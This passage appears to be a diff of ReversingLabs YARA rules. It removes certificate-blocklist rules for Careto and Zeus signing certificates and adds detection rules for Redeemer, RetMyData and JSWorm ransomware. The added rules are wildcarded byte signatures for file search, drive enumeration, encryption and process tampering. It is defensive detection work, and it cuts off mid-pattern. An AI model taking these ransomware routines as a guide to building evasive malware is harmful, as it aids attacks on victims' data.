48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 48 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 8B 4C 24 ?? 48 89 41 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 41 ?? + 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 8B 94 24 ?? ?? ?? + ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 98 4C 8B C0 48 8D + 15 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 48 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ?? + 48 8B D0 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 + ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 45 33 C9 41 B8 + ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 50 ?? 48 8B 44 24 ?? 48 8B 48 ?? FF 15 ?? ?? ?? ?? + 48 8D 05 ?? ?? ?? ?? F0 FF 00 48 83 C4 ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IDAutomation.com" and pe.signatures[i].serial=="45:31:95:4f:62:65:30:40:55:f6:6c:e4:f6:24:f9:5b" and 1384819199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($enum_shares) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0E808F231515Bc519Eea1A73Cdf3266F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Redeemer : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing Careto malware." + description = "Yara rule that detects Redeemer ransomware." author = "ReversingLabs" - id = "1f1eb5c2-bfef-58df-b51e-c558d87cd5d2" - date = "2023-11-08" - modified = "2023-11-08" + id = "080ab595-862b-5dc2-aaff-a0efd819a9fa" + date = "2022-01-17" + modified = "2022-01-17" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L135-L151" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "05e466e304ed7a8f5c1c93aac4a4b7019d6fb1e07aeb45d078b657f838d1f3bd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Redeemer.yara#L1-L105" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "28287f6620a2f7a90057d1f97947e065721119e26398fe659331dc5fe99761de" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Redeemer" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? + 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 89 B5 ?? ?? + ?? ?? 89 B5 ?? ?? ?? ?? 3B F7 0F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 8B 3D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? + C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? + ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B + CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 + } + $encrypt_files_p1 = { + 80 FB ?? 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 55 ?? 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? + C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2 + 6A ?? 66 89 10 8D 45 ?? 52 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 + 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2 6A ?? 66 89 10 8D 45 ?? + 52 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 8D 45 ?? 3B C6 + 74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ?? + ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6 45 + } + $encrypt_files_p2 = { + 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 35 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? + 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D6 85 C0 0F 85 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 50 FF D6 8B 85 ?? ?? ?? + ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 45 ?? 83 C4 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 + C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D + 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E + 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8 + } + $modify_processes_p1 = { + 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 + } + $modify_processes_p2 = { + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ?? ?? 6A ?? 8D 04 52 8D 04 C1 + 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F + 43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D B5 + ?? ?? ?? ?? 0F 43 95 ?? ?? ?? ?? 0F 43 B5 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C8 ?? + 50 56 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ?? + ?? 6A ?? 8D 04 52 8D 04 C1 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? + ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC FF 37 E8 + ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C6 45 ?? ?? 8D 85 ?? ?? + ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 + 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 FF 77 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TecSystem Ltd." and pe.signatures[i].serial=="0e:80:8f:23:15:15:bc:51:9e:ea:1a:73:cd:f3:26:6f" and 1468799999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($modify_processes_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_36Be4Ad457F062Fa77D87595B8Ccc8Cf : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Retmydata : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing Careto malware." + description = "Yara rule that detects RetMyData ransomware." author = "ReversingLabs" - id = "224ec8ed-e4f0-5d1b-8cdd-a669a7e3e859" - date = "2023-11-08" - modified = "2023-11-08" + id = "f7a091d9-7ace-5aad-95b4-d5101fa7fdea" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L153-L169" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d19a6f22a1e702a4da69c867195722adf8f1dd84539f2c584af428fe4b1caf79" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.RetMyData.yara#L1-L79" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "54ce38d75e9ab82a77b9c338f75e180e19ac745f149289c7478a4aa3b44d70fd" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "RetMyData" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 9D ?? ?? ?? ?? 8B 04 04 + C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 40 51 51 0F 84 ?? ?? ?? ?? 8D + B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85 + C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ?? + ?? ?? 89 74 24 ?? 89 7C 24 ?? 74 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? + 89 D8 E8 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? BA ?? ?? + ?? ?? 89 D8 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 D8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 + 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 0F 85 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F 5D C3 55 BA ?? ?? ?? ?? 89 + E5 53 51 89 C3 E8 ?? ?? ?? ?? 48 74 ?? 5A 89 D8 5B 5D E9 ?? ?? ?? ?? 58 5B 5D C3 + } + $enum_resources = { + 55 89 E5 57 56 53 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 29 C4 8D 95 ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? 8B 04 04 C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? + ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? + 83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 31 F6 89 + 44 24 ?? 8D 85 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? + ?? ?? ?? 83 EC ?? 3B B5 ?? ?? ?? ?? 7D ?? 83 7B ?? ?? 75 ?? 8B 43 ?? C7 44 24 ?? ?? + ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F8 E8 ?? ?? ?? ?? 89 D8 46 83 C3 ?? + E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 50 8D 65 ?? 5B 5E 5F + 5D C3 + } + $encrypt_files = { + 55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 + C0 89 C2 A3 ?? ?? ?? ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31 + C0 89 D7 F3 AB 85 DB 75 ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? + ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 5C 24 ?? 8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 3C + 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C + 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 + 24 E8 ?? ?? ?? ?? 89 74 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 EC + ?? 83 F8 ?? 89 C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 89 7C 24 ?? 89 34 24 EB ?? 8D + BD ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? + ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 89 + 1C 24 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 + ?? ?? ?? ?? EB ?? F7 D8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? + 89 1C 24 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 EC ?? BA ?? ?? ?? ?? C7 04 24 ?? ?? ?? + ?? B8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 + 74 24 ?? 89 1C 24 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 EC ?? + FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TecSystem Ltd." and pe.signatures[i].serial=="36:be:4a:d4:57:f0:62:fa:77:d8:75:95:b8:cc:c8:cf" and 1372377599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_resources) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_75A38507Bf403B152125B8F5Ce1B97Ad : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Jsworm : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing Zeus malware." + description = "Yara rule that detects JSWorm ransomware." author = "ReversingLabs" - id = "6805abd8-217e-5179-ab5a-297e2a17e65e" - date = "2023-11-08" - modified = "2023-11-08" + id = "a4702cc3-1e08-5631-b832-5d28cb92a819" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L171-L187" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "af21cee3ee92268c3aa0106a245e5a00c5ba892fca3e4fd2dc55e302ed5d470a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.JSWorm.yara#L1-L93" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8ba5e2f29f5f06e6e6714bbba1129862da8c3a83bf7f296818eddee2593cae38" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "JSWorm" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ?? + 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 45 ?? ?? 8B 4E ?? 8B 56 ?? 3B CA 73 + ?? 8D 41 ?? 89 46 ?? 8B C6 83 FA ?? 72 ?? 8B 06 C7 04 48 ?? ?? ?? ?? EB ?? 6A ?? C6 + 85 ?? ?? ?? ?? ?? 8B CE FF B5 ?? ?? ?? ?? 6A ?? E8 + } + $find_drives = { + 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 0F 84 ?? + ?? ?? ?? 8B CE C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01 + 41 84 C0 75 ?? 2B CA 51 56 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B + CC 89 65 ?? 33 C0 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66 + 89 01 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 55 ?? 8B CC E8 ?? ?? ?? ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B + C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 + ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 46 03 F0 38 0E 0F 85 + ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 + 5D C3 E8 ?? ?? ?? ?? E8 + } + $encrypt_files_p1 = { + 8B 00 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F0 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? + 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? + ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FA ?? + 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? + 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B + CB C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 E6 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89 + 85 ?? ?? ?? ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA + ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 + 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? + ?? 8B 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 + 85 ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA + ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 + E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF + 15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 53 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? + 0F 8C ?? ?? ?? ?? 7F ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 + FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 